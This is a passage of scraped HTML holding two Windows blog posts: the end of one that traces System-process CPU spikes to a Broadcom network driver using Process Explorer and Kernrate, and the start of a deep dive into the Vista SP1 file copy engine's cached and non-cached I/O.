were significant: </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="124" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029794/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029794/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121016iAAB314F6306A729E" style="WIDTH: 550px; HEIGHT: 124px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The System process is special because it doesn’t host an executable image like other processes. It exists solely to host operating system threads for the memory manager, cache manager, and other subsystems, as well as device driver threads. <SPAN style="mso-spacerun: yes"> </SPAN> These threads execute entirely in kernel mode, which is why System process CPU usage shows up as red in Process Explorer’s graphs. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I suspected that a third-party device driver was the cause of the problem, so the first step in my investigation was to figure out which thread was using CPU, which would hopefully point me at the guilty party. I watched vigilantly for signs of trouble every time I switched networks and jumped the first time I saw one. Process Explorer shows the threads running in a process on the Threads page of the Process Properties dialog, so I double-clicked on the System process and switched to the Threads page the next time I noticed the CPU spike: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029795/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029795/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121017iF288300BDE800D4D" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The “ntkrnlpa.exe” prefix on each thread’s start address identified the ones I saw at the top of the CPU usage sort order as operating system threads (Ntkrnlpa.exe is the version of the kernel loaded on 32-bit client systems that have no execute memory protection or server systems that need to address more than 4GB of memory). Because I had previously configured Process Explorer to retrieve symbols for operating system images from the Microsoft public symbol server, the thread list also showed the names of the thread start functions. The most active threads began in the ExpWorkerThread function, which means that they were worker threads that perform work on behalf of the system and device drivers. Instead of creating dedicated threads that consume memory resources, the system and drivers can throw work at the shared pool of operating system <A class="" href="#" mce_href="#" target="_blank"> worker threads </A> </FONT> <FONT face="Calibri" size="3"> . </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Unfortunately, knowing that worker threads were causing the CPU usage didn’t get me any closer to solving identifying a root cause. I really needed to know what functions the worker threads were calling, because the functions would be inside the device driver or operating system component on whose behalf the threads were running. One way to look inside a thread’s execution is to look at the thread’s stack with Process Explorer. The stack is a memory region that stores function invocations and Process Explorer will show you a thread’s stack when you select the thread press the Stack button or double-click on the thread. On Vista, however, you get this error when you try and look at the stack for threads in the System process: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="165" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029796/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029796/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121018iB47EA75F884E38EF" style="WIDTH: 229px; HEIGHT: 165px" width="229" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The System process is a special type of process on Vista called a “protected process” that doesn’t allow any access to its threads or memory. Protected processes were introduced to support Digital Rights Management (DRM) so that hi-definition content providers can store content encryption keys with a reduced risk of an administrative user using DRM-stripping tools to reach into the process and read the keys. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> That approach foiled, I had to find another way to see what the worker threads were doing. For that, I turned to <A class="" href="#" mce_href="#" target="_blank"> KernRate </A> </FONT> <FONT face="Calibri" size="3"> , a command-line profiling tool that’s a free download from Microsoft. KernRate can profile user-mode processes and kernel-mode threads. It uses the sample-based profiling facility that was introduced in the first release of Windows NT, which records the unique addresses at which the CPU is executing when the profiling interval timer fires. When you stop a profile capture, Kernrate retrieves the information from the kernel, maps the addresses to the loaded device drivers into which the fall, and can even use the symbol engine to report the names of functions. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I wouldn’t need symbols if the trace identified a device driver, so I ran Kernrate without passing it any arguments. Despite the fact that there’s no officially supported version of Kernrate for Vista, the version for Windows XP, Kernrate_i386_XP.exe, works on Vista 32-bit (you can also use the recently-released <A class="" href="#" mce_href="#" target="_blank"> xperf </A> </FONT> <FONT face="Calibri" size="3"> tool to perform similar profiling - xperf requires Vista or Server 2008, but works on 64-bit versions). I let the profile run through heavy bursts of CPU and then hit Ctrl+C to print the results to the console window: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="150" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029797/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029797/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121019iF170B5A8B078248D" style="WIDTH: 550px; HEIGHT: 150px" width="550" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> In first place were hits in the kernel, but in second was a driver that I didn’t recognize, b57nd60x. Most driver files are located in the %systemroot%\system32\drivers directory, so I could have opened that folder and viewed the file’s properties in Explorer, but I had Process Explorer open so a quicker way to check the driver’s vendor and version was to open the DLL view for the System process. The DLL view shows the DLLs and files mapped into the address space of user-mode processes, but for the System process it shows the kernel modules, including drivers, loaded on the system. The DLL view revealed that the driver was for my laptop’s NIC, was from Broadcom, and was version 10.10: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="320" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029798/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029798/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121020iC5675BDE40520B6B" style="WIDTH: 550px; HEIGHT: 320px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Now that I knew that the Broadcom driver was causing the CPU usage, the next step was to see if there was a newer version available. I went to Dell’s download page for my system, but didn’t find anything. Suspecting that what I noticed might not be a known issue, I decided to notify Broadcom. I used contacts on the hardware ecosystem team here at Microsoft to find the Broadcom driver representative and email him a detailed description of the symptoms and my investigation. He forwarded my email to the driver developer, who acknowledged that they didn’t know the cause and within a few days sent me a debug version of the driver with symbols so that I could capture a Kernrate profile that would tell them what functions in the driver were active during the spikes. The problem reoccurred a few days later and I sent back the kernrate output with function information. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The developer explained that my trace revealed that the driver didn’t efficiently interact with the PCIe bus when processing specific queries and the problem seemed to be exacerbated by my particular hardware configuration. He gave me new driver for me to try and after a few weeks of monitoring my laptop closely for issues, I confirmed that the problem appeared to be resolved. The updated driver has not yet been posted to Dell’s support site, but I expect it to show up there in the near future. Another case closed, this time with Process Explorer, Kernrate, and a helpful Broadcom driver developer. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> If you like these troubleshooting blog posts, you’ll enjoy the webcast of my <A class="" href="#" mce_href="#" target="_blank"> “Case of the Unexplained…” </A> </FONT> <FONT face="Calibri" size="3"> session from TechEd/ITforum. Its 75 minutes are packed with real-world troubleshooting examples, including the one written up in this post and others, as well as some that I haven’t documented. At the end of the session I ask the audience to send me screenshots, log files and descriptions of their own troubleshooting success stories, in return for which I’ll send back a signed copy of <A class="" href="#" mce_href="#" target="_blank"> Windows Internals </A> </FONT> <FONT face="Calibri" size="3"> . The offer stands, so remember to document your investigation and you can get a free book. I’ve gotten a number of great examples and my next blog post will be a guest post by someone that watched the webcast and used Process Monitor to solve a problem with their web server. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Finally, if you want to see me speak live, come to <A class="" href="#" mce_href="#" target="_blank"> TechEd US/IT Pro </A> </FONT> <FONT face="Calibri" size="3"> in June in Orlando where I’ll be delivering “The Case of the Unexplained…”, “Windows Server 2008 Kernel Advances”, and “Windows Security Boundaries”. Hope to see you there! </FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:38:56 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-system-process-cpu-spikes/ba-p/723630 MarkRussinovich 2019-06-27T06:38:56Z Inside Vista SP1 File Copy Improvements https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/inside-vista-sp1-file-copy-improvements/ba-p/723622 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Feb 04, 2008 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT face="Calibri" size="3"> Windows Vista SP1 includes a number of enhancements over the original Vista release in the areas of application compatibility, device support, power management, security and reliability. You can see a detailed list of the changes in the Notable Changes in Windows Vista Service Pack 1 whitepaper that you can download <A class="" href="#" mce_href="#" target="_blank"> here </A> </FONT> </SPAN> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> . </FONT> </FONT> </SPAN> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> One of the improvements highlighted in the document is the increased performance of file copying for multiple scenarios, including local copies on the same disk, copying files from remote non-Windows Vista systems, and copying files between SP1 systems. How were these gains achieved? The answer is a complex one and lies in the changes to the file copy engine between Windows XP and Vista and further changes in SP1. Everyone copies files, so I thought it would be worth taking a break from the “Case of…” posts and dive deep into the evolution of the copy engine to show how SP1 improves its performance. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Copying a file seems like a relatively straightforward operation: open the source file, create the destination, and then read from the source and write to the destination. In reality, however, the performance of copying files is measured along the dimensions of accurate progress indication, CPU usage, memory usage, and throughput. In general, optimizing one area causes degradation in others. Further, there is semantic information not available to copy engines that could help them make better tradeoffs. For example, if they knew that you weren’t planning on accessing the target of the copy operation they could avoid caching the file’s data in memory, but if it knew that the file was going to be immediately consumed by another application, or in the case of a file server, client systems sharing the files, it would aggressively cache the data on the destination system. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <B style="mso-bidi-font-weight: normal"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> File Copy in Previous Versions of Windows </FONT></FONT></SPAN></B></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> In light of all the tradeoffs and imperfect information available to it, the Windows file copy engine tries to handle all scenarios well. Prior to Windows Vista, it took the straightforward approach of opening both the source and destination files in cached mode and marching sequentially through the source file reading 64KB (60KB for network copies because of an SMB1.0 protocol limit on individual read sizes) at a time and writing out the data to the destination as it went. When a file is accessed with cached I/O, as opposed to memory-mapped I/O or I/O with the no-buffering flag, the data read or written is stored in memory, at least until the Memory Manager decides that the memory should be repurposed for other uses, including caching the data of other files. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> The copy engine relied on the Windows Cache Manager to perform asynchronous read-ahead, which essentially reads the source file in the background while Explorer is busy writing data to a different disk or a remote system. It also relied on the Cache Manager’s write-behind mechanism to flush the copied file’s contents from memory back to disk in a timely manner so that the memory could be quickly repurposed if necessary, and so that data loss is minimized in the face of a disk or system failure. You can see the algorithm at work in this <A class="" href="#" mce_href="#" target="_blank"> Process Monitor </A> trace of a 256KB file being copied on Windows XP from one directory to another with filters applied to focus on the data reads and writes: </FONT> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT face="Calibri" size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> <IMG height="210" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815675/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815675/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121007i0490C987BDAE7AD9" style="WIDTH: 550px; HEIGHT: 210px" width="550" /> </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000; mso-no-proof: yes"> <SHAPETYPE coordsize="21600,21600" filled="f" id="_x0000_t75" preferrelative="t" spt="75" path="m@4@5l@4@11@9@11@9@5xe" stroked="f"> <STROKE joinstyle="miter"> </STROKE> <FORMULAS> <F eqn="if lineDrawn pixelLineWidth 0"> </F> <F eqn="sum @0 1 0"> </F> <F eqn="sum 0 0 @1"> </F> <F eqn="prod @2 1 2"> </F> <F eqn="prod @3 21600 pixelWidth"> </F> <F eqn="prod @3 21600 pixelHeight"> </F> <F eqn="sum @0 0 1"> </F> <F eqn="prod @6 1 2"> </F> <F eqn="prod @7 21600 pixelWidth"> </F> <F eqn="sum @8 21600 0"> </F> <F eqn="prod @7 21600 pixelHeight"> </F> <F eqn="sum @10 21600 0"> </F> </FORMULAS> <PATH gradientshapeok="t" connecttype="rect" extrusionok="f"> </PATH> <LOCK aspectratio="t" ext="edit"> </LOCK> </SHAPETYPE> </SPAN> <SPAN style="COLOR: #000000"> </SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Explorer’s first read operation at event 0 of data that’s not present in memory causes the Cache Manager to perform a non-cached I/O, which is an I/O that reads or writes data directly to the disk without caching it in memory, to fetch the data from disk at event 1, as seen in the stack trace for event 1: </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000; mso-no-proof: yes"> </SPAN> <SPAN style="COLOR: #000000"> </SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> <IMG height="342" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815676/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815676/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121008i4D71E41F074511E6" style="WIDTH: 327px; HEIGHT: 342px" width="327" /> </FONT> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> In the stack trace, Explorer’s call to ReadFile is at frame 22 in its BaseCopyStream function and the Cache Manager invokes the non-cached read indirectly by touching the memory mapping of the file and causing a page fault at frame 8. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Because Explorer opens the file with the sequential-access hint (not visible in trace), the Cache Manager’s read-ahead thread, running in the System process, starts to aggressively read the file on behalf of Explorer at events 2 and 3. You can see the read-ahead functions in the stack for event 2: </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000; mso-no-proof: yes"> </SPAN> <SPAN style="COLOR: #000000"> </SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> <IMG height="276" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815677/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815677/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121009iF65B5030B9F21B87" style="WIDTH: 315px; HEIGHT: 276px" width="315" /> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> You may have noticed that the read-ahead reads are initially out of order with respect to the original non-cached read caused by the first Explorer read, which can cause disk head seeks and slow performance, but Explorer stops causing non-cached I/Os when it catches up with the data already read by the Cache Manager and its reads are satisfied from memory. <SPAN style="mso-spacerun: yes"> </SPAN> The Cache Manager generally stays 128KB ahead of Explorer during file copies. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> At event 4 in the trace, Explorer issues the first write and then you see a sequence of interleaved reads and writes. At the end of the trace the Cache Manager’s write-behind thread, also running in the System process, flushes the target file’s data from memory to disk with non-cached writes. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <B style="mso-bidi-font-weight: normal"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Vista Improvements to File Copy </FONT></FONT></SPAN></B></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> During Windows Vista development, the product team revisited the copy engine to improve it for several key scenarios. One of the biggest problems with the engine’s implementation is that for copies involving lots of data, the Cache Manager write-behind thread on the target system often can’t keep up with the rate at which data is written and cached in memory. That causes the data to fill up memory, possibly forcing other useful code and data out, and eventually, the target’s system’s memory to become a tunnel through which all the copied data flows at a rate limited by the disk. <SPAN style="mso-spacerun: yes"> </SPAN> </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> <SPAN style="mso-spacerun: yes"> </SPAN> </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Another problem they noted was that when copying from a remote system, the file’s contents are cached twice on the local system: once as the source file is read and a second time as the target file is written. Besides causing memory pressure on the client system for files that likely won’t be accessed again, involving the Cache Manager introduces the CPU overhead that it must perform to manage its file mappings of the source and destination files. </FONT> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> A limitation of the relatively small and interleaved file operations is that the SMB file system driver, the driver that implements the Windows remote file sharing protocol, doesn’t have opportunities to pipeline data across high-bandwidth, high-latency networks like WLANs. Every time the local system waits for the remote system to receive data, the data flowing across the network drains and the copy pays the latency cost as the two systems wait for the each other’s acknowledgement and next block of data. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> After studying various alternatives, the team decided to implement a copy engine that tended to issue large asynchronous non-cached I/Os, addressing all the problems they had identified. With non-cached I/Os, copied file data doesn’t consume memory on the local system, hence preserving memory’s existing contents. Asynchronous large file I/Os allow for the pipelining of data across high-latency network connections, and CPU usage is decreased because the Cache Manager doesn’t have to manage its memory mappings and inefficiencies of the original Vista Cache Manager for handling large I/Os contributed to the decision to use non-cached I/Os. They couldn’t make I/Os arbitrarily large, however, because the copy engine needs to read data before writing it, and performing reads and writes concurrently is desirable, especially for copies to different disks or systems. Large I/Os also pose challenges for providing accurate time estimates to the user because there are fewer points to measure progress and update the estimate. The team did note a significant downside of non-cached I/Os, though: during a copy of many small files the disk head constantly moves around the disk, first to a source file, then to destination, back to another source, and so on. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> After much analysis, benchmarking and tuning, the team implemented an algorithm that uses cached I/O for files smaller than 256KB in size. For files larger than 256KB, the engine relies on an internal matrix to determine the number and size of non-cached I/Os it will have in flight at once. The number ranges from 2 for files smaller than 2MB to 8 for files larger than 8MB. The size of the I/O is the file size for files smaller than 1MB, 1MB for files up to 2MB, and 2MB for anything larger. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> To copy a file 16MB file, for example, the engine issues eight 2MB asynchronous non-cached reads of the source file, waits for the I/Os to complete, issues eight 2MB asynchronous non-cached writes of the destination, waits again for the writes to complete, and then repeats the cycle. You can see that pattern in this Process Monitor trace of a 16MB file copy from a local system to a remote one: </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000; mso-no-proof: yes"> </SPAN> <SPAN style="COLOR: #000000"> </SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> <IMG height="226" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815678/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815678/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121010i59EBDAC5D451F182" style="WIDTH: 550px; HEIGHT: 226px" width="550" /> </FONT> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> While this algorithm is an improvement over the previous one in many ways, it does have some drawbacks. One that occurs sporadically on network file copies is out-of-order write operations, one of which is visible in this trace of the receive side of a copy: </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000; mso-no-proof: yes"> </SPAN> <SPAN style="COLOR: #000000"> </SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815680/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815680/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121011i976351035E27F609" /> </FONT> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Note how the write operation offsets jump from 327,680 to 458,752, skipping the block at offset 393,216. That skip causes a disk head seek and forces NTFS to issue an unnecessary write operation to the skipped region to zero that part of the file, which is why there are two writes to offset 393,216. You can see NTFS calling the Cache Manager’s CcZeroData function to zero the skipped block in the stack trace for the highlighted event: </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000; mso-no-proof: yes"> </SPAN> <SPAN style="COLOR: #000000"> </SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> <IMG height="258" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815683/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815683/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121012iB1374E4C02D62D8D" style="WIDTH: 309px; HEIGHT: 258px" width="309" /> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> A bigger problem with using non-cached I/O is that performance can suffer in publishing scenarios. If you copy a group of files to a file share that represents the contents of a Web site for example, the Web server must read the files from disk when it first accesses them. This obviously applies to servers, but most copy operations are publishing scenarios even on client systems, because the appearance of new files causes desktop search indexing, triggers antivirus and antispyware scans, and queues Explorer to generate thumbnails for display on the parent directory’s folder icon. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> 